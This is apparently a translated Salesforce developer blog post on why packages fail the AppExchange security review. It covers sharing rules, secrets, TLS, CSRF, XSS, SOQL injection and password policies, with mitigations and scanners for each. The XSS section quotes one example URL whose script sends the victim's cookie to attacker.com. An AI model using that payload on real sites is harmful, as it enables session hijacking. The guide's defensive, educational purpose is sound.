Nota: En algunos casos, puede agregar documentación de falsos positivos para argumentar que un CVE particular registrado no podría aplicarse a su oferta, ya que quizás no esté utilizando la funcionalidad asociada con ese CVE.
Básicamente, esto significa que tiene clases de Apex en las que no ha agregado explícitamente la palabra clave with sharing al encabezado de la clase, omitiendo así las reglas de uso compartido de una organización.
Simplemente verifique todas sus clases de Apex y asegúrese de tener with sharing (o el uso compartido heredado) definido en el encabezado de la clase. Para los casos en los que necesita que una clase se ejecute sin compartir (por ejemplo, la clase debe ejecutarse en un contexto de sistema y no en un contexto de usuario), agregue una explicación a su documento de falso positivo que explique el caso de uso empresarial (e idealmente, agregue comentarios en la parte superior). de los encabezados de clase relevantes para que quede aún más claro).
Code Analyzer , PMD para VS Code y Checkmarx también pueden ayudarlo a escanear su código.
Obtenga más información sobre cómo compartir el cumplimiento a través de Trailhead .
Los secretos no deben estar codificados en el código fuente. Aunque el código puede estar contenido en un paquete administrado donde el código está oculto para los clientes, todavía existen razones por las que esta es una práctica insegura, entre ellas:
Asegúrese de que no haya secretos codificados en el código fuente, incluso si es un paquete administrado. Asegúrese de que todos los secretos se almacenen de una de las siguientes maneras:
Obtenga más información sobre el almacenamiento seguro de secretos en Trailhead .
Todas las conexiones entrantes y salientes que involucran a sus comunidades, sitios y portales de Salesforce deben utilizar Transport Layer Security (TLS) 1.2. Este requisito es válido en los modos Lightning Experience y Salesforce Classic para comunidades y sitios, independientemente de si están en las ediciones Essentials, Enterprise, Performance, Unlimited o Developer.
Verifique que el acceso a su navegador, las integraciones de API y otras funciones de Salesforce sean compatibles con TLS 1.2.
Una forma sencilla de hacerlo es utilizar Qualys SSL Scanner. El equipo de revisión de seguridad ejecutará este análisis en todos y cada uno de los puntos finales externos o que no sean de Salesforce involucrados en su solución. Si sus terminales no reciben una calificación A por cumplimiento de SSL/TLS, su revisión de seguridad no será aprobada.
Para ejecutar el escaneo, simplemente ingrese la URL base en el formulario web de prueba del servidor SSL de Qualys y presione Enviar.
Puede encontrar más detalles sobre los requisitos de TLS en las notas de la versión .
Este tipo de vulnerabilidad describe situaciones en las que se filtra información confidencial, como secretos de aplicaciones, datos del sistema o información de depuración demasiado detallada, a través de funciones de registro u otros flujos de salida. Por lo general, esto sucede cuando el registro detallado está habilitado para fines de desarrollo, pero luego no se reduce adecuadamente antes de enviarlo para la revisión de seguridad de AppExchange.
En su paquete de Salesforce, asegúrese de buscar en su código fuente todas las declaraciones de depuración del paquete para asegurarse de que no registren información confidencial o secretos.
Asegúrese de que los códigos de error y los mensajes de error en toda su solución tengan un nivel de información apropiado para que todos los usuarios los vean. Por ejemplo, los usuarios habituales generalmente no deberían ver seguimientos de pila completos ni información de depuración detallada. De manera similar, asegúrese de que otras funciones de registro o flujos de salida tampoco filtren datos confidenciales.
Code Analyzer y PMD para VS Code pueden ayudarlo a detectar estos problemas en las aplicaciones de Salesforce, y los escáneres de aplicaciones web como Burp Suite , Chimera u OWASP ZAP también pueden ayudarlo a detectar estos problemas en sus integraciones externas y aplicaciones web.
Obtenga más información sobre cómo verificar los seguimientos de la pila e información detallada sobre las excepciones en el número 13.
La falsificación de solicitudes entre sitios (CSRF) es un tipo de ataque que engaña a una víctima para que ejecute acciones no deseadas en una aplicación web en la que está autenticada. Explotar la confianza que un sitio tiene en el navegador del usuario puede llevar a acciones potencialmente dañinas, como cambiar direcciones de correo electrónico y contraseñas, o incluso realizar transacciones sin el conocimiento o consentimiento del usuario.
En la plataforma Salesforce, existe un token anti-CSRF para contrarrestar dichos ataques, que ofrece protección mientras se utilizan controladores y métodos estándar. Sin embargo, los desarrolladores pueden eludir involuntariamente estas salvaguardas anti-CSRF al crear sus propios métodos de acción.
En general, las aplicaciones web pueden prevenir ataques CSRF principalmente implementando tokens anti-CSRF, que son valores únicos y específicos del usuario incluidos en cada solicitud de cambio de estado para verificar la fuente. Además, deben adoptar la práctica de cookies del mismo sitio, que impide que el navegador envíe la cookie junto con solicitudes entre sitios, mitigando así los riesgos de CSRF.
Para páginas de Visualforce:
Para componentes Lightning:
init (para Aura) ,connectedCallback , renderedCallback o constructor .Al realizar llamadas API:
CSRF es uno de los tipos de problemas de seguridad más complicados, por lo que vale la pena invertir en aprender más sobre él en profundidad. Para los paquetes de Salesforce, existe excelente documentación para desarrolladores y un módulo Trailhead como referencia.
Para otros tipos de aplicaciones web, es posible que desees consultar la documentación de OWASP .
Los escáneres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , también pueden ayudarle a detectar estos problemas en sus aplicaciones web externas.
Los ataques de secuencias de comandos entre sitios (XSS) son problemas de inyección en los que se insertan secuencias de comandos dañinas en sitios web confiables. Ocurren cuando un atacante explota una aplicación web para enviar código malicioso, a menudo un script del lado del cliente, a un usuario diferente. Estos ataques explotan fallas en aplicaciones web que utilizan entradas de usuario no validadas o codificadas en su salida.
En un ataque XSS, el navegador de un usuario desprevenido ejecuta el script malicioso, creyendo que proviene de una fuente confiable. Esto permite que el script acceda a cookies, tokens de sesión u otros datos confidenciales almacenados en el navegador. Incluso puede modificar el contenido HTML de la página.
Los ataques XSS almacenados son de tipo persistente, en los que la aplicación web almacena la entrada maliciosa y luego se muestra a los usuarios. Los ataques XSS reflejados, por otro lado, generalmente ocurren cuando se inyecta código malicioso en una URL, que se ejecuta cuando un usuario hace clic en ella (por ejemplo: http://example.com/search?query=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script> ).
Los motivos por los que su aplicación podría ser susceptible incluyen:
innerHTML , lwc:dom=”manual” o el componente lightning:formattedRichText sin la validación de entrada adecuada.Su objetivo principal debe ser evitar la manipulación de DOM, pero también recomendamos practicar el filtrado de entrada y la codificación de salida, que incluyen:
eval() , DOMParser.parseFromString() , Document.implementation.createHTMLDocument() , setTimeout() , setInterval() )Este módulo de Trailhead explica exactamente cómo mitigar XSS con estas técnicas, y nuestra documentación para desarrolladores también es útil aquí. Para obtener consejos específicos sobre la protección contra XSS en componentes Lightning, consulte la página Seguridad Lightning en la Guía de codificación segura.
Para aplicaciones web que no son de Salesforce, también puede consultar la documentación de OWASP para obtener consejos adicionales.
Los escáneres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , también pueden ayudarle a detectar estos problemas.
Muchos paquetes administrados por Salesforce no pasan la revisión de seguridad por no almacenar JavaScript como recursos estáticos en sus paquetes y, en su lugar, se vinculan a archivos JavaScript alojados externamente con etiquetas <script> . La razón principal de esta regla es que permite un control de versiones mucho más seguro y garantiza la integridad de los archivos JavaScript en su paquete de Salesforce incluso si la fuente externa está comprometida.
Nuestra regla es que todos los recursos de script y estilo deben agregarse al paquete como recursos estáticos y luego cargarse con una etiqueta <apex:includeScript> en su página (para Visualforce) o un ltng:require en su .cmp o .app. marcado (para Aura).
Nota: Si tiene un LWC, defina los módulos JavaScript que importe a su componente o use la función loadScript para cargar un archivo JavaScript de recursos estáticos.
Para paquetes que no son LWC, la mejor manera de verificar este problema es buscar manualmente su código fuente para asegurarse de que todas las bibliotecas de JavaScript estén almacenadas como recursos estáticos, no cargadas dinámicamente a través de hipervínculos.
Para situaciones en las que esto no sea factible, recomendamos programar una cita en horario de oficina técnica para analizar su caso de uso. Es posible obtener una excepción en ciertos casos.
Obtenga más información sobre este problema en nuestra documentación para desarrolladores .
La inyección SOQL es la versión específica de Salesforce de la inyección SQL. Ocurre cuando una entrada no validada proporcionada por el usuario se inserta directamente en una consulta SOQL dinámica. Si la entrada no está validada, puede incluir comandos SOQL que modifican efectivamente la declaración SOQL y engañan a la aplicación para que ejecute comandos no deseados.
La forma más sencilla de evitar el problema es evitar consultas dinámicas en favor de consultas estáticas y utilizar variables vinculantes. De lo contrario, deberá validar estrictamente las entradas del usuario antes de usarlas en consultas mediante técnicas como encasillamiento, lista blanca de entradas o escape.
Code Analyzer , PMD para VS Code y Checkmarx también pueden ayudarlo a escanear su código.
Para obtener más información, consulte nuestro módulo Trailhead o revise nuestra documentación para desarrolladores .
Para aplicaciones que no son de Salesforce, es posible que desee obtener más información sobre la inyección SQL en la guía OWASP . Los escáneres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , también pueden ayudar a identificar problemas de inyección SQL.
Similar al problema de usar etiquetas <script> o <link> para cargar JavaScript en sus paquetes, usar etiquetas <link> o <style> para cargar CSS en lugar de <apex:stylesheet> (Visualforce) o <ltng:require> ( Aura) se considera una práctica insegura. Estas etiquetas <link> y <style> pueden hacer referencia a recursos externos o en línea que contienen CSS o JavaScript, y la arquitectura de seguridad Lightning Web Security (LWS) de Salesforce no los controla ni los desinfecta.
Para los componentes de Aura, en particular, el uso de <ltng:require> también permite a Salesforce aplicar correctamente las reglas de seguridad LWS y garantizar que el CSS que está cargando esté correctamente aislado y no incluya código o estilos JavaScript no seguros que puedan afectar negativamente a otros. partes de su aplicación Salesforce.
Para hacer referencia a un recurso CSS externo que haya subido como recurso estático, use una etiqueta <apex:stylesheet> en su página (para Visualforce) o una etiqueta <ltng:require> en su marcado .cmp o .app (para Aura ). Busque el código fuente de su paquete para asegurarse de que no haya utilizado etiquetas <link> o <style> en ningún lugar para cargar recursos CSS.
Nota: Si tiene una LWC, no puede encontrarse con este problema de todos modos porque, al igual que las etiquetas <script> , las etiquetas <style> ya están bloqueadas para su uso dentro de las plantillas HTML. En su lugar, incluiría su CSS en el archivo CSS asociado de su componente o usaría la función loadStyle para cargar un archivo CSS de recursos estáticos.
Puede encontrar más información en nuestra documentación para desarrolladores .
Salesforce tiene reglas estrictas sobre el uso de JavaScript y una de esas reglas es que JavaScript no se puede ejecutar directamente dentro del contexto de la aplicación Salesforce. Esto significa que no puede incluir bloques de JavaScript directamente dentro de los componentes que se ejecutan en Salesforce DOM, como HomePageComponents, WebLinks, Custom Buttons, etc.
En cambio, todo JavaScript debe residir bajo el dominio de espacio de nombres de su aplicación en las páginas de Visualforce que usted controla, de modo que el JavaScript personalizado esté esencialmente aislado del DOM principal de Salesforce. Eso significa que no puede usar JavaScript para crear botones personalizados, pestañas web, componentes de página de inicio y elementos similares (por ejemplo, incluir controladores de eventos de JavaScript onclick en botones personalizados podría ser motivo de falla).
Esto es algo que deberá verificar manualmente en el código fuente de su paquete Salesforce. Verifique y asegúrese de que no haya utilizado JavaScript para crear botones personalizados, pestañas web, componentes de la página de inicio u otros elementos similares, y verifique que cualquier JavaScript personalizado esté incluido solo en el dominio de su aplicación con espacio de nombres en las páginas de VisualForce que controla como parte de su aplicación.
Una forma de verificar esto es buscar el texto <openType>onClickJavaScript</openType> en los archivos de metadatos de la aplicación (a menudo en archivos XML como weblink/something.weblink) y, si lo encuentra, asegúrese de eliminarlo. Incluso si su aplicación solo está destinada a usarse en Lightning Experience, si la vulnerabilidad está presente para los usuarios en modo Clásico, el paquete no se puede aprobar.
Esta regla en particular no está especialmente bien documentada, pero puede leer más en el documento Lista de verificación de revisión de seguridad de AppExchange (se requiere iniciar sesión en la comunidad de socios).
En el contexto de la revisión de seguridad de AppExchange, este término se refiere específicamente a situaciones (generalmente en aplicaciones o servicios web que no son de Salesforce o fuera de plataforma) donde sus páginas de error muestran datos confidenciales del sistema o información de depuración. Por ejemplo, a veces las páginas de error incluyen seguimientos de pila completos que muestran cómo se hace referencia internamente a los objetos o rutas de archivo relativas al lugar donde está instalada la aplicación. A veces, incluso la información confidencial queda expuesta de esta manera.
Busque en su base de código llamadas que causen excepciones o que los seguimientos de pila se representen en cadenas o flujos de salida, y realice pruebas que puedan causar errores, como entradas no válidas, entradas vacías, entradas demasiado largas, acceso a páginas internas sin autenticación, omisión de aplicaciones. flujo, etc
La herramienta de fuzzing de Burp Suite puede ser una gran ayuda en este caso.
También puede obtener excelentes consejos para realizar pruebas de seguimiento de pila a través de esta guía de OWASP .
Se supone que los componentes de Aura son pequeños, autónomos, reutilizables y reposicionables. CSS que evita la encapsulación de componentes (a través de .THIS) o que utiliza un posicionamiento no estándar (por ejemplo, flotante o posición: absoluta o fija) infringe estas garantías y puede interferir con la visualización de otros componentes. En particular, el uso del posicionamiento absoluto en CSS es la razón principal de este tipo de falla.
Si bien esto puede no parecer un problema de seguridad a primera vista, puede alterar el diseño del sitio web de Salesforce y viola el espíritu del modelo de seguridad de Lightning, donde los componentes están estrictamente aislados y se garantiza que permanecerán en su propio carril.
Este es otro problema que debes verificar manualmente. Básicamente, busque en el CSS de su componente Aura, especialmente para posicionamiento absoluto/fijo o ancho y alto fijos. También recomendamos revisar nuestra documentación para asegurarse de que está siguiendo todas las reglas CSS correctas.
Este término se refiere específicamente a los casos en los que no ha configurado el indicador isExposed en Lightning Message Channel en falso. Dado que esto proporciona acceso a la API del Servicio de mensajes Lightning (LMS), que le permite publicar y suscribirse a mensajes en todo el DOM y entre Aura, Visualforce y Lightning Web Components, debe establecerse en falso a menos que sea realmente necesario.
Tiene dos opciones, según su caso de uso, que incluyen:
isExposed=false . Esto debe hacerse creando un nuevo componente de canal LMS porque los componentes existentes con isExposed=true no pueden cambiar isExposed=false . Utilice únicamente el componente recién creado en el código.Más información está disponible en la documentación .
Esto se refiere a una situación en la que se envía información confidencial de larga duración en URL (por ejemplo, un ID o secreto de cliente, o un nombre de usuario/contraseña). En realidad, esto puede llevar a que se filtren secretos a largo plazo de varias maneras posibles. Por ejemplo:
Burp Suite puede ayudarle aquí para aplicaciones web que no sean de Salesforce o fuera de plataforma, pero en general recomendamos comprobar manualmente su aplicación para detectar cualquier caso en el que se envíen secretos a largo plazo a través de URL. Dependiendo de su caso de uso, es posible que deba realizar cambios, como usar solicitudes POST en lugar de solicitudes GET, cambiar su método de autenticación (OAuth 2.0 es generalmente ideal) y emplear cifrado y mejores métodos de almacenamiento de secretos.
La guía OWASP es un gran recurso a seguir.
El nombre de esta vulnerabilidad simplemente se refiere a situaciones en las que se utiliza HTTP en lugar de HTTPS.
Las herramientas de escaneo pueden ser de ayuda, pero una forma aún más segura de verificar esto es buscar en el código fuente enlaces HTTP y cambiarlos a HTTPS. Puede aprender un poco más sobre cómo esto mejora la seguridad en esta página de OWASP .
Por lo general, este problema solo surge en aplicaciones web externas fuera de la plataforma Salesforce. Se refiere a una situación en la que los atacantes pueden enumerar listas de nombres de usuario o correos electrónicos de su base de usuarios, generalmente analizando cambios en mensajes de error en funciones de inicio de sesión, funciones de olvido de contraseña o registros de cuentas. Los atacantes suelen hacer esto para poder comprobar si hay contraseñas reutilizadas de bases de datos comprometidas y fugas o volcados de contraseñas.
Verifique sus mensajes de error para registros de cuentas, recuperación de contraseñas, intentos de inicio de sesión, etc., y asegúrese de que su mensaje de error sea el mismo independientemente de si el nombre de usuario o el correo electrónico ingresado es válido.
Por ejemplo, muchos sitios incluyen un mensaje genérico, como: "Si dicho usuario existe, recibirá un correo electrónico con un restablecimiento de contraseña". Este tipo de mensaje general evita confirmar la existencia de un nombre de usuario o correo electrónico.
Por supuesto, en determinadas situaciones, puede ser inevitable (por ejemplo, durante el registro de una cuenta, es posible que deba confirmar que se ha utilizado un nombre de usuario). En esas situaciones, intente implementar controles que impidan la enumeración por fuerza bruta, como captchas para evitar que los robots eliminen su formulario de registro.
Burp Suite es una excelente herramienta para verificar esto, pero si no la tiene, también puede revisar sus funcionalidades de inicio de sesión manualmente.
OWASP tiene una guía útil para evitar la enumeración de correos electrónicos y nombres de usuarios.
En ocasiones, el equipo de seguridad falla en sitios y aplicaciones web externos (que no sean Salesforce) por tener políticas de contraseñas problemáticas, como por ejemplo:
Además de evitar las situaciones anteriores, consulte la Hoja de referencia de autenticación de OWASP para obtener algunas pautas sobre cómo establecer políticas de contraseñas seguras:
Burp Suite también es muy útil para identificar problemas relacionados con las contraseñas (por ejemplo, puede usarlo para intentar forzar sus páginas de inicio de sesión).
Esto es un poco diferente del problema de administración de contraseñas descrito anteriormente. Un eco de contraseña se refiere a situaciones en las que las contraseñas se reflejan en texto sin formato en la interfaz de usuario (como cuando el usuario visita su propia página de configuración) o en llamadas API/respuestas JSON.
Asegúrese de que su contraseña no se revele ni se transmita en texto sin formato en ninguna parte de su aplicación. Asegúrese de que en las páginas de configuración u otras páginas que muestran secretos, se muestren solo como asteriscos (se pueden mostrar al hacer clic en el botón si es necesario).
Consulte la hoja de referencia sobre almacenamiento de contraseñas de OWASP para obtener más información.
Burp Suite , o quizás Chimera u OWASP ZAP , también pueden ayudarle a detectar estos problemas.
Si su solución incluye sitios web o aplicaciones web personalizados que no son de Salesforce, le recomendamos encarecidamente invertir en una licencia de Burp Suite si es financieramente viable para su organización. Burp Suite es una de las mejores herramientas de seguridad del mercado y también la utiliza mucho nuestro propio equipo de seguridad de productos. Chimera u OWASP ZAP son alternativas completamente gratuitas, pero prepárate para invertir más tiempo en términos de revisión manual, ya que carecen de muchas de las potentes funciones/herramientas que tiene Burp Suite.
Nota: Si su oferta se integra con aplicaciones o servicios web que no son de su propiedad, no intente escanear los puntos finales hasta que haya obtenido el permiso del propietario.
Salesforce Product Security también utiliza Code Analyzer , PMD para VS Code y Checkmarx para revisar el código fuente del paquete Salesforce. También utilizan la base de datos CVE y el escáner Qualys SSL en la mayoría de los envíos.
Si tiene problemas de seguridad y necesita orientación técnica, los socios ISV pueden registrarse para obtener horas de oficina gratuitas con nuestros ingenieros de seguridad a través del Portal de seguridad para socios .
Por último, no podemos recomendar lo suficiente Trailhead en términos de preparación para revisiones de seguridad. Vale la pena dedicar tiempo a la ruta Desarrollar aplicaciones web seguras y también acabamos de renovar el módulo Revisión de seguridad de AppExchange , que analiza el proceso de envío de un extremo a otro.
Anika Teppo es evangelista técnica en Salesforce. Ha estado trabajando con el equipo de revisión de seguridad de AppExchange en Salesforce desde 2017, y su función actual consiste en hacer que Salesforce Labs y las soluciones internas se revisen y publiquen en AppExchange.
Añadir a holgura Suscríbete a RSS